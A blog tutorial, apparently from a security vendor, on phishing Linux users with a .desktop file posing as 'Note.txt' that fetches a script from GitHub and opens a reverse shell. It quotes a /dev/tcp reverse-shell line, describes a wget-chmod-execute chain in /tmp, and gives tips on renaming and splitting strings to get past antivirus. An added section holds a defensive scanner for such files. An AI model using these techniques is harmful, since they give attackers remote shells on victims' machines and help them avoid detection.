Introduction
Most phishing campaigns target Windows users, which is not surprising given how widely Windows is used. In this post we will see how phishing can be carried out against Linux users effectively, and without detection, through the .desktop ("Desktop Entry") file, delivering the payload through trusted websites such as GitHub and GitLab. We will run the Desktop Entry on an Ubuntu machine with ESET NOD32 Anti-Virus installed and running.
What is a .desktop "Desktop Entry" file?
Basically, a .desktop file is the Linux equivalent of a Windows shortcut file: it points to an application, and when the .desktop file is executed it runs the application it points to. We can therefore create a custom .desktop file that points to /bin/sh, the Linux shell, and executes commands to download the payload, or simply connects the target back to our server so that we receive a shell.
Desktop Entry Basics
We will cover some basic syntax; don't worry, it is not complicated at all. As with any code, you have to define the start point of the file, and we do this with [Desktop Entry] as the first line (you can create a file, name it name.desktop and start writing into it). The syntax of Desktop Entry files is essentially a set of key/value pairs (e.g. Name=AppName, that is "Key=Value"). The keys are predefined by the Desktop Entry syntax and each has a specific role; the value is given by the user.
Now, let's look at the keys:
Name: sets the name of the file.
Type: the type of the Desktop Entry. It can be one of three things: Application, Link or Directory. Each Type of Desktop Entry takes different keys. Application takes the path of the program to be run, and it can also carry arguments for that program (e.g. /bin/sh -c "touch /tmp/testfile").
Version: the version of the Entry file.
Icon: the icon to display for the desktop file.
Exec: the path of the program to run (including its arguments).
We will not be using many keys in our file. If you want to know more keys and more details, you can check them out from Here.
Now, before we start creating our file, let's get our payload ready on GitHub.
Host the payload on GitHub & GitLab
Since GitHub and GitLab are trusted organisations, we can be sure that our payload will be delivered successfully (note: GitHub or GitLab may be blocked in some organisations, which rarely happens). I am going to use GitHub for the explanation, but you can use either GitHub or GitLab. The first thing is to create a new repository and give it a non-suspicious name (e.g. don't use Myshell, Payload, reverse, bind and so on); instead, use normal, familiar names, not just for the repository but also for the payload name and its file extension. As we are targeting Linux users, we can run the payload from the shell as ./app.ext no matter whether the extension is elf or anything else.
I named the repository VsocietySolution, gave it a short description and created it. Now I will create a new shell file containing some scripting code, including bash -i >& /dev/tcp/$Nothin/$Nothing 0>&1, which basically runs an interactive bash shell and connects back to us through /dev/tcp (you can use udp instead of tcp), depending on which protocol your listener uses for the connection.
Here you can see the file and the code. What I did here is to lightly obfuscate the code by separating the words that can be detected by the anti-virus (e.g. bash, /dev/tcp, or even an IP address, in case the AV runs a regex to detect one). I also obfuscated the file name itself by changing it to access.log.
Create the .desktop File
It is time to create our malicious .desktop file to deliver to the victim, and since we understand the syntax we can create it easily. Create a new file and name it any.desktop, then open it with any text editor you have.
I named the file vsociety.desktop and, as you can see, the file shows up as Unnamed; we will now add a name for the file and the full code.
Here I set the name to Note.txt. Exec then runs the sh Linux shell, with the -c argument giving the command that the shell should execute. The command that will be executed changes into the tmp directory, downloads our shell script using wget (wget is installed by default on most Linux systems), gives execute permission to our file access.log, and then runs it. In the last line I chose an icon to use; Debian-based Linux actually sets an icon automatically according to the file name. You can find the icon you want to set for the file in the system: locate icon | grep text lists files/paths containing the word icon and keeps only those that also contain the word text.
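The key/value syntax from "Desktop Entry Basics" and the specific traits of the file just described (an Application entry named like a text document, an Exec that runs sh -c, downloads a file into /tmp, marks it executable and runs it, and a text-document icon) are exactly what a defender can check for. The following is an added example written for this post, not code from the original article: a small scanner that parses the [Desktop Entry] group and reports those indicators. The two sample entries, the heuristic lists and the URL (a non-resolvable placeholder) are constructed for the example.

```python
"""Desktop Entry scanner (added example, not code from the original post).

It parses the Key=Value syntax of the [Desktop Entry] group and flags the
indicators the post describes for its malicious file: Exec running a shell
with -c, a download tool in Exec, staging and running a file from /tmp,
and a Name/Icon that pretend to be a text document. The sample entries
below are constructed; the URL is a non-resolvable placeholder.
"""
import os
import re
import sys
from typing import Dict, List

# Heuristic lists chosen for this example (assumptions, not from the post).
SHELLS = {"sh", "bash", "dash", "zsh",
          "/bin/sh", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash"}
DOWNLOADERS = ("wget", "curl")
DOC_EXTENSIONS = (".txt", ".pdf", ".doc", ".docx", ".odt")

# Constructed benign entry: an ordinary text editor launcher.
BENIGN_ENTRY = """[Desktop Entry]
Version=1.0
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
"""

# Constructed entry mirroring the post's description (placeholder URL).
SUSPICIOUS_ENTRY = """[Desktop Entry]
Type=Application
Name=Note.txt
Exec=sh -c "cd /tmp; wget https://example.invalid/access.log; chmod +x access.log; ./access.log"
Icon=text-x-generic
"""


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the Key=Value pairs of the [Desktop Entry] group.

    Blank lines and # comments are skipped; other groups such as
    [Desktop Action ...] are ignored. Keys are case-sensitive.
    """
    entry: Dict[str, str] = {}
    in_main_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main_group = (line == "[Desktop Entry]")
            continue
        if in_main_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def find_indicators(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry matches the text-document masquerade
    described in the post; an empty list means nothing was flagged."""
    hits: List[str] = []
    exec_line = entry.get("Exec", "")
    tokens = exec_line.split()
    shell_with_c = bool(tokens) and tokens[0] in SHELLS and "-c" in tokens
    if shell_with_c:
        hits.append("Exec runs a shell with an inline command (-c)")
    if any(re.search(rf"\b{tool}\b", exec_line) for tool in DOWNLOADERS):
        hits.append("Exec downloads content at launch time")
    if "/tmp" in exec_line and ("chmod" in exec_line or "./" in exec_line):
        hits.append("Exec stages and executes a file from /tmp")
    is_app = entry.get("Type") == "Application"
    name = entry.get("Name", "")
    if is_app and name.lower().endswith(DOC_EXTENSIONS):
        hits.append(f"Name {name!r} looks like a document but Type is Application")
    icon = entry.get("Icon", "")
    if shell_with_c and re.search(r"text|document", icon, re.IGNORECASE):
        hits.append(f"Icon {icon!r} mimics a text document for a shell launcher")
    return hits


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Walk root and return {path: indicators} for every flagged .desktop file."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".desktop"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_indicators(parse_desktop_entry(fh.read()))
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    # Default: scan the current user's Desktop; pass directories to override.
    roots = sys.argv[1:] or [os.path.expanduser("~/Desktop")]
    for root in roots:
        for path, reasons in scan_directory(root).items():
            print(path)
            for reason in reasons:
                print("  -", reason)
```

Run it with no arguments to scan ~/Desktop, or pass directories such as ~/Downloads. The benign editor launcher produces no findings, while the constructed entry modelled on this section triggers all five indicators; the icon check is deliberately tied to the shell check so that legitimate launchers with "text" in their icon name are not flagged.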
Getting a shell
Now we will try our malicious file on an up-to-date Ubuntu box with ESET NOD32 Anti-Virus installed, and we will bypass it. First, let's start our netcat listener on the attacker box. In the shell script we set 8080 as the connection port, so we will start our listener on port 8080.
Our anti-virus is running and we will run our file.
We executed the Desktop Entry file, with the following result:
As you can see, our access.log file was downloaded into the /tmp directory, as configured by the command inside our .desktop file. The file executed successfully and we got a shell on the attacker box.
Conclusion
This was a very easy way to perform phishing against Linux users without needing to develop any malware or spending hours researching an effective way to avoid detection. You can use the same approach to get a shell and then upload your beacon; just don't forget to use non-suspicious names and obfuscation.
#linux #phishing #attack #tutorial
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.